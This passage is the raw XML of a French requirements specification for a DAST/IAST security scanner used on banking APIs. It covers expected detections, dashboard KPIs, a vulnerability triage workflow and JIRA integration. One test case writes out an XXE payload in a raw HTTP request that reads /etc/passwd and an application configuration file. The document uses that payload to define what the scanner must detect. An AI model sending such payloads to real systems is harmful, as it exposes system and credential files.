              <w:t xml:space="preserve">      │   passwd"&gt;]&gt;     │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Lecture /etc/passwd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  root:x:0:0:...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HTTP 200         │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  + contenu fichier│                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │◀──────────────────│                        │</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Requête HTTP brute — payload XXE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POST /api/v1/import/payments HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/xml</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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!DOCTYPE payments [</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe2 SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   "file:///opt/app/config/application.properties"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;payments&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;payment&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;amount&gt;100&lt;/amount&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;description&gt;&amp;xxe;&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;/payment&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/payments&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST soumet des payloads XXE (file://, http:// OOB, expect://) sur tous les endpoints acceptant du XML (Content-Type: application/xml, text/xml). Détection : (1) contenu de fichier système dans la réponse ; (2) requête OOB sortante vers le serveur DAST (détection aveugle). Finding : CWE-611, A03:2021, CVSS 7.5.</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L'IAST détecte l'usage de parseurs XML sans configuration sécurisée : SAXParserFactory sans setFeature(DISALLOW_DOCTYPE_DECL, true), DocumentBuilderFactory sans setFeature(EXTERNAL_GENERAL_ENTITIES, false), XMLInputFactory sans setProperty(SUPPORT_DTD, false). Détection statique à l'exécution de la configuration dangereuse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>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12   Exigences Fonctionnelles — Dashboard &amp; Gestion des Vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le dashboard est le point d'entrée quotidien des équipes sécurité, développement et management. Un outil avec d'excellentes capacités de détection mais un dashboard inexploitable ne sera pas adopté. Les exigences ci-dessous sont non négociables pour un usage opérationnel en contexte bancaire.</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12.1   Vue d'ensemble et KPIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1.1   Tableau de bord exécutif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vue consolidée multi-applications / multi-projets : nombre total de vulnérabilités actives par criticité (CRITICAL / HIGH / MEDIUM / LOW / INFO), avec évolution temporelle (sparkline sur 30/90 jours)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Score de sécurité global par application (ex : 0-100, basé sur la sévérité et l'âge des vulnérabilités non corrigées) — aligné CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Taux de couverture des scans : % d'APIs scannées vs inventaire total, date du dernier scan par application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alertes temps réel : nouvelles vulnérabilités CRITICAL depuis le dernier scan, SLA de correction dépassé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vue conformité DORA : APIs FCI sans scan hebdomadaire, écarts aux RTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1.2   Vue par projet / application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrage par projet GitLab, équipe, tag (FCI / non-FCI), environnement (staging, prod), langage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Timeline des scans : historique des runs, findings par run, comparaison entre runs (différentiel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Top 5 des vulnérabilités les plus anciennes non corrigées — avec SLA résiduel affiché</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12.2   Gestion des Vulnérabilités — Workflow de Triage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026"/>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Statut</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Qui peut changer</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 sur les scans suivants</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Open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Vulnérabilité détectée, non traitée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Automatique (scan)</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Remonte à chaque scan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Confirmed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Validée par l'équipe sécurité — vuln réelle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Sécurité / Lead Dev</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Remonte + comptabilisée dans le SLA</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False Positive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Requalifiée comme FP après analyse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Sécurité</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Supprimée des runs suivants (baseline)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Accepted Risk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Risque accepté avec justification et date d'expiration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RSSI</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Exclue du dashboard actif jusqu'à expiration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Fixed</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Correction déployée et vérifiée par re-scan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Dev / Sécurité</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Ne remonte plus si absente du scan suivant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 Progress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Correction en cours — ticket JIRA associé</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Dev</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Remonte mais marquée avec lien ticket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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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 Exigence : la requalification False Positive doit être obligatoirement justifiée (champ commentaire requis) et horodatée avec l'identité de l'auteur. Sans traçabilité de la requalification, l'outil ne peut pas être utilisé dans un contexte DORA auditable.</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12.3   Commentaires et collaboration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Système de commentaires natif sur chaque finding : texte libre, mention @utilisateur, pièces jointes (capture, log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fil de discussion par vulnérabilité : historique des échanges entre sécurité et développement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notifications configurables : email, Teams/Slack, webhook — sur nouvelle vuln CRITICAL, SLA dépassé, requalification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mention du commit GitLab ayant introduit la vulnérabilité (si IAST avec source mapping actif)</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12.4   Intégration JIRA / Outils de ticketing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.4.1   Création de tâche automatique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Création de ticket JIRA (ou GitHub Issues, Azure DevOps, ServiceNow) directement depuis un finding, en un clic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping automatique des champs : titre (nom de la vuln), description (contexte + request/response), priorité (CRITICAL → P1, HIGH → P2...), labels (security, DAST/IAST, API), composant (projet applicatif)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lien bidirectionnel : le ticket JIRA affiche le finding, le finding affiche le ticket JIRA avec son statut actuel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fermeture automatique du ticket si le finding passe en status Fixed lors du re-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.4.2   Configuration requise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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Exemple de mapping JIRA attendu</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">jira:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  server: https://jira.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  project: SEC-API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  issue_type: Bug</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  field_mapping:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    summary:     '[{severity}] {vuln_name} — {application}'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    description: '{description}\n\nCWE: {cwe}\nOWASP: {owasp}\nCVSS: {cvss}'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    priority:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      CRITICAL: P1 - Bloquant</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      HIGH:     P2 - Critique</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      MEDIUM:   P3 - Majeur</w:t>
